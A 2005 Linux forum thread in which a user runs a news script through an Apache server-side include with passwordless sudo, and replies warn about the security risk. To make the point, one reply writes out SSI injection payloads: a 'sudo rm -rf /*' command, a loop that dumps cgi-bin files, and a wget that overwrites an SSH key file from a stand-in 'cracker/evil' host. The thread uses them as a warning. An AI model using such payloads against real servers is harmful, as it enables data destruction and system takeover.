LinuxQuestions.org (https://www.linuxquestions.org/questions/)
-   Linux - Newbie (https://www.linuxquestions.org/questions/linux-newbie-8/)
-   -   when using SSI, can I limit how often a command can be run? (https://www.linuxquestions.org/questions/linux-newbie-8/when-using-ssi-can-i-limit-how-often-a-command-can-be-run-296222/)

jeffreybluml 03-01-2005 06:15 AM

when using SSI, can I limit how often a command can be run?
 
For instance, I've got a little script that goes out and gets all my RSS feeds, then parses them to display on my webpage. Rather than have cron update the feeds every 10 minutes (I want them to always be fresh, but that seems like a bit much), I'm using server side includes: a link on my page executes the script (via sudo, which I've configured to let apache run this one command without a password), so the feeds only get updated when I'm actually reading them. This is working really well, but it obviously leaves anybody viewing the page free to click the link a million times and bog down (or crash) my PC.

To make sure I'm clear, here's the code on the webpage to issue the command...

Code:

<pre>
<!--#exec cmd="sudo getnews" -->
</pre>

So, get to the point, right? Is there a setting somewhere with which I can control how often this can be done? The getnews "script" lives in /bin and it's basically just a shell "script" (I use quotes because I'm no script writer; it's just a file that starts with #!/bin/bash and then issues a bunch of calls to a perl script, so I call that a script). Can I either set a minimum time between allowed runs of this file in /bin, or is there some way to set a minimum wait between times apache is allowed to use sudo (remember, no password is set, so I can't just use password expiry) to issue it? Either would essentially create the same effect.
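Something like this is roughly the kind of wrapper I have in mind, just to make the question concrete (a sketch only; the stamp-file path and the 10-minute figure are made up):

Code:

#!/bin/bash
# Hypothetical wrapper around /bin/getnews: only run the real fetch
# if the last run was more than 10 minutes (600 seconds) ago.
STAMP=/tmp/getnews.stamp
NOW=$(date +%s)
LAST=0
if [ -f "$STAMP" ]; then
    LAST=$(date -r "$STAMP" +%s)   # mtime of the stamp file, in epoch seconds
fi
if [ $((NOW - LAST)) -ge 600 ]; then
    touch "$STAMP"
    /bin/getnews
fi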

Ugh, it's early, so I hope I'm being clear....

Any ideas, thoughts, suggestions?

Thanks,

Jeff

gnube 03-01-2005 06:35 AM

You can look at the man page for wait or sleep and use that. Here is the first line of the sleep man page:

The sleep utility suspends execution for a minimum of seconds. It is
usually used to schedule the execution of other commands (see EXAMPLES
below).

But if you decide to stay with the current setup of your program, you are creating a really big security risk. Allowing the server-side include #exec command lets anyone who can get content into your pages execute system commands directly on the server's filesystem. So I could do this on your machine, as root, right now:

<!--#exec cmd="sudo rm -rf /*" -->

This would probably be the least of your problems. A rootkit would be installed faster than you can say Debian. If you do not take security precautions, people will abuse your box and the whole internet will laugh and point at you.

gnube

jeffreybluml 03-01-2005 06:39 AM

Thanks for the reply. I'll check the man pages for those...

As for the security risk, I had read that. Let me just confirm that what I've done is sufficient....

I DO have a guestbook on the site (which is what helps create the risk, since it gives visitors write access, right?), but it has its own subdirectory. I have set that directory in the httpd.conf file to NOT allow execs. That works, right? I've also tried to confirm it by adding a new guestbook entry with this in it...

Code:

<pre>
<!--#exec cmd="whoami" -->
</pre>
<pre>
<!--#exec cmd="ls" -->
</pre>

Neither of these returned anything in the guestbook entry, so I figured it had worked. Does that sound right to you?
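In case it matters, the bit I added to httpd.conf for that directory looks roughly like this (the path here is just an example, not my real one):

Code:

<Directory "/var/www/html/guestbook">
    # SSI pages are still parsed here, but the #exec directive is disabled
    Options IncludesNOEXEC
</Directory>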

Are there other risks I need to know about? I've tried to do my research, but let me know if I'm missing anything.

Thanks again!

gnube 03-01-2005 07:25 AM

The issue is not only creating a directory where the shtml file cannot execute commands; it is also who it runs as. Apache is usually set to run as a non-root user. If you have changed /etc/sudoers to allow it to execute commands as root, then it can do whatever it wants in the wrong hands. Someone could rewrite the URL to include malicious code that Apache can execute as root! This is serious.

Did you try <!--#exec cmd="sudo ls"--> ?
Or <!--#exec cmd="for i in `ls /var/www/cgi-bin/`; do cat $i; done"-->
Or <!--#exec cmd="touch .ssh/identity.pub"-->
<!--#exec cmd="wget -q -O .ssh/identity.pub http://cracker/evil"-->


I recommend not allowing Apache to be run as root and taking the apache user out of the sudoers file. If apache needs to get info from a remote site, why don't you script it with curl or wget? Then you can download it anywhere you want and the .shtml file can process it. Then you decrease your exposure and risk considerably.

Consider something like this;

Small shell script:

Code:

curl -o newsfile http://www.newssite.com/newsfile

shtml file:

Code:

<!--#include virtual="newsfile"-->

jeffreybluml 03-01-2005 07:37 AM

I'm actually using wget already to get a couple of the feeds (for some reason my JSMFeed.pl script doesn't like a couple of them), but it too would start to bog my system down if the page were refreshed repeatedly... right? That is assuming you were suggesting adding the curl call right into the webpage...

I had set the sudoers file so that apache could run ONLY the /bin/getnews script, figuring that would take care of the sudo security risk.
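For the record, the sudoers entry was just a single line, something like this (going from memory, so the exact form may be slightly off):

Code:

# added with visudo: let the apache user run only this one script, without a password
apache  ALL = (root) NOPASSWD: /bin/getnews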

After all this talk I've gotten all security-nervous again, so I dumped the whole exec cmd thing and went back to having cron update the feeds every 10 minutes.

Then I just put a refresh link on the page, for those internet newbies who can't find the button....;-)

Oh well, twas a fun learning experience...

Thanks for the replies...

gnube 03-01-2005 08:40 AM

Can't you update the feeds in the background with cron and wget, then refresh the web page? I think that would be the most efficient use of resources.
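Something along these lines, for example (the URL and paths are only placeholders):

Code:

# crontab entry: fetch the feed every 10 minutes, quietly, to a local file
*/10 * * * * /usr/bin/wget -q -O /var/www/html/newsfile http://www.newssite.com/newsfile

Then the page only ever includes the local newsfile, and nobody can trigger a fetch just by reloading it.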

jeffreybluml 03-01-2005 09:05 AM

You're probably right. That was how I originally set it up, but then I decided that it was a waste to have the feeds updating when I'm not at the computer looking at them, so I put this in.

I'm starting to think I just did this for something to do, as the more I think about it the sillier this whole venture seems. But again, it was a fun little experiment and I learned something. I have reverted to my original setup, which really was the most logical: cron updates the feeds every 10 minutes (as well as a couple of weather radar images, more use for wget) and the frame on the webpage auto-updates every 5.
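The frame refresh is just the standard meta tag, in case anyone is curious (300 seconds = 5 minutes):

Code:

<meta http-equiv="refresh" content="300">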

Question regarding wget: is there a way to COMPLETELY suppress ANY output from the command? I read through man and info, and I can get it to run "in the background" and all that, but it still produces an output message like "Continuing in background... PID... output will be written to wget-log" (which then gets mailed to me via /var/spool/mail), and of course it saves a log file. So I've got cron deleting these log files periodically, as well as my /var/spool/mail (seriously, cron is the coolest tool ever!), but is there any way to just stop them from being created in the first place?
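For what it's worth, the cleanup jobs currently look roughly like this (the username and paths are just examples, not my real ones):

Code:

# crontab: clear out wget's leftover logs and empty my mail spool once a day
0 3 * * * rm -f /home/jeff/wget-log*
5 3 * * * cat /dev/null > /var/spool/mail/jeff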

Anyways, regardless of whether or not you can answer that, thanks for the insight here. I'm glad I was able to be persuaded back to keeping it simple....

Thanks,

